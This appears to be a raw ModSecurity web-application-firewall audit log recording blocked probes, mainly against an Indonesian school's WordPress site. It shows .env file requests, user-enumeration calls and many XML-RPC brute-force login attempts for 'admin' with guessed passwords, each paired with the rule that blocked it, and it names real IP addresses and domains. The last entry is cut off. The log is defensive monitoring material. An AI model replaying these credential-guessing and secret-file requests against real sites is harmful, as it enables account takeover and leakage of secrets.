--97f4ed32-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 139.59.136.184
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 139.59.136.184
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--97f4ed32-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--97f4ed32-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745509200913842 813 (- - -)
Stopwatch2: 1745509200913842 813; combined=315, p1=275, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--97f4ed32-Z--
--69f14c7b-A--
[24/Apr/2025:22:48:45 +0700] aApdXfiVYlyO1xhz7yN-AAAAAM0 103.236.140.4 45136 103.236.140.4 8181
--69f14c7b-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.38.184
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.38.184
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--69f14c7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--69f14c7b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745509725000142 2900 (- - -)
Stopwatch2: 1745509725000142 2900; combined=1379, p1=440, p2=907, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--69f14c7b-Z--
--dc4fc311-A--
[24/Apr/2025:22:48:52 +0700] aApdZGLuk3f9kLjsdTZWKAAAAIs 103.236.140.4 45316 103.236.140.4 8181
--dc4fc311-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.38.184
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.38.184
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--dc4fc311-C--
demo.sayHello
--dc4fc311-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dc4fc311-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745509732375282 5439 (- - -)
Stopwatch2: 1745509732375282 5439; combined=4264, p1=512, p2=3509, p3=41, p4=36, p5=97, sr=72, sw=69, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dc4fc311-Z--
--17033e26-A--
[24/Apr/2025:23:00:22 +0700] aApgFt5yz20UX9VrdZObsgAAAFE 103.236.140.4 35776 103.236.140.4 8181
--17033e26-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2
Accept-Charset: utf-8
--17033e26-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--17033e26-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745510422928390 782 (- - -)
Stopwatch2: 1745510422928390 782; combined=291, p1=249, p2=0, p3=0, p4=0, p5=42, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--17033e26-Z--
--d5a90020-A--
[24/Apr/2025:23:20:52 +0700] aApk5GLuk3f9kLjsdTZjiAAAAIE 103.236.140.4 56406 103.236.140.4 8181
--d5a90020-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d5a90020-C--
wp.getUsersBlogs
admin
123456789
--d5a90020-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d5a90020-E--
--d5a90020-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745511652961605 4949 (- - -)
Stopwatch2: 1745511652961605 4949; combined=3405, p1=404, p2=2818, p3=0, p4=0, p5=104, sr=74, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d5a90020-Z--
--0e3bb613-A--
[24/Apr/2025:23:21:57 +0700] aAplJfiVYlyO1xhz7yORbQAAANU 103.236.140.4 60564 103.236.140.4 8181
--0e3bb613-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0e3bb613-C--
wp.getUsersBlogs
admin
admin1981
--0e3bb613-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0e3bb613-E--
--0e3bb613-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745511717977936 5222 (- - -)
Stopwatch2: 1745511717977936 5222; combined=4013, p1=560, p2=3242, p3=0, p4=0, p5=121, sr=203, sw=90, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0e3bb613-Z--
--9a5b5f03-A--
[24/Apr/2025:23:22:57 +0700] aAplYWLuk3f9kLjsdTZlbgAAAIk 103.236.140.4 36136 103.236.140.4 8181
--9a5b5f03-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9a5b5f03-C--
wp.getUsersBlogs
admin
Marketing2012
--9a5b5f03-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a5b5f03-E--
--9a5b5f03-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (88+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745511777313223 4903 (- - -)
Stopwatch2: 1745511777313223 4903; combined=3338, p1=396, p2=2779, p3=0, p4=0, p5=94, sr=81, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a5b5f03-Z--
--d6e70608-A--
[24/Apr/2025:23:23:57 +0700] aAplnd5yz20UX9VrdZOrbAAAAFI 103.236.140.4 40188 103.236.140.4 8181
--d6e70608-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d6e70608-C--
wp.getUsersBlogs
admin
smkn22-jkt.sch000
--d6e70608-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d6e70608-E--
--d6e70608-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745511837195333 5006 (- - -)
Stopwatch2: 1745511837195333 5006; combined=3512, p1=414, p2=2929, p3=0, p4=0, p5=98, sr=85, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d6e70608-Z--
--48f6d934-A--
[24/Apr/2025:23:24:57 +0700] aApl2clQo524fhbIj1xoMAAAABA 103.236.140.4 43822 103.236.140.4 8181
--48f6d934-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--48f6d934-C--
wp.getUsersBlogs
admin
Adminadmin
--48f6d934-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--48f6d934-E--
--48f6d934-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745511897621672 4715 (- - -)
Stopwatch2: 1745511897621672 4715; combined=3246, p1=399, p2=2692, p3=0, p4=0, p5=90, sr=81, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--48f6d934-Z--
--a14fd039-A--
[24/Apr/2025:23:25:57 +0700] aApmFclQo524fhbIj1xo9gAAABU 103.236.140.4 47668 103.236.140.4 8181
--a14fd039-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a14fd039-C--
wp.getUsersBlogs
admin
zaq1xsw2
--a14fd039-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a14fd039-E--
--a14fd039-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745511957321312 5336 (- - -)
Stopwatch2: 1745511957321312 5336; combined=3794, p1=448, p2=3097, p3=0, p4=0, p5=145, sr=87, sw=104, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a14fd039-Z--
--d78d8e17-A--
[24/Apr/2025:23:27:01 +0700] aApmVd5yz20UX9VrdZOuEQAAAEw 103.236.140.4 51794 103.236.140.4 8181
--d78d8e17-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d78d8e17-C--
wp.getUsersBlogs
admin
112233
--d78d8e17-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d78d8e17-E--
--d78d8e17-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512021075750 4969 (- - -)
Stopwatch2: 1745512021075750 4969; combined=3782, p1=431, p2=3151, p3=0, p4=0, p5=117, sr=89, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d78d8e17-Z--
--e58e462b-A--
[24/Apr/2025:23:28:01 +0700] aApmkclQo524fhbIj1xrTAAAAA0 103.236.140.4 55704 103.236.140.4 8181
--e58e462b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e58e462b-C--
wp.getUsersBlogs
admin
123312
--e58e462b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e58e462b-E--
--e58e462b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512081078488 5470 (- - -)
Stopwatch2: 1745512081078488 5470; combined=4069, p1=459, p2=3417, p3=0, p4=0, p5=111, sr=100, sw=82, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e58e462b-Z--
--69063d7a-A--
[24/Apr/2025:23:29:01 +0700] aApmzWLuk3f9kLjsdTZrcgAAAIY 103.236.140.4 59600 103.236.140.4 8181
--69063d7a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--69063d7a-C--
wp.getUsersBlogs
admin
administrators
--69063d7a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--69063d7a-E--
--69063d7a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512141368477 4553 (- - -)
Stopwatch2: 1745512141368477 4553; combined=3369, p1=447, p2=2763, p3=0, p4=0, p5=94, sr=91, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--69063d7a-Z--
--103b3722-A--
[24/Apr/2025:23:29:55 +0700] aApnA95yz20UX9VrdZOwowAAAFA 103.236.140.4 34564 103.236.140.4 8181
--103b3722-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--103b3722-C--
wp.getUsersBlogs
admin
1234%^&*
--103b3722-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--103b3722-E--
--103b3722-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512195394899 4025 (- - -)
Stopwatch2: 1745512195394899 4025; combined=2791, p1=364, p2=2299, p3=0, p4=0, p5=78, sr=69, sw=50, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--103b3722-Z--
--5f86b977-A--
[24/Apr/2025:23:30:01 +0700] aApnCclQo524fhbIj1xtRAAAAAQ 103.236.140.4 34916 103.236.140.4 8181
--5f86b977-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5f86b977-C--
wp.getUsersBlogs
admin
1235698
--5f86b977-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5f86b977-E--
--5f86b977-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512201328626 6617 (- - -)
Stopwatch2: 1745512201328626 6617; combined=4778, p1=626, p2=3980, p3=0, p4=0, p5=99, sr=119, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5f86b977-Z--
--f0c70441-A--
[24/Apr/2025:23:31:01 +0700] aApnRd5yz20UX9VrdZOyeQAAAEc 103.236.140.4 38876 103.236.140.4 8181
--f0c70441-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f0c70441-C--
wp.getUsersBlogs
admin
fitness
--f0c70441-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0c70441-E--
--f0c70441-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (94+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745512261671526 5602 (- - -)
Stopwatch2: 1745512261671526 5602; combined=3931, p1=437, p2=3295, p3=0, p4=0, p5=116, sr=86, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0c70441-Z--
--43b0493f-A--
[24/Apr/2025:23:32:02 +0700] aApngd5yz20UX9VrdZOzTwAAAFM 103.236.140.4 42746 103.236.140.4 8181
--43b0493f-B--
POST /xmlrpc.php HTTP/1.0
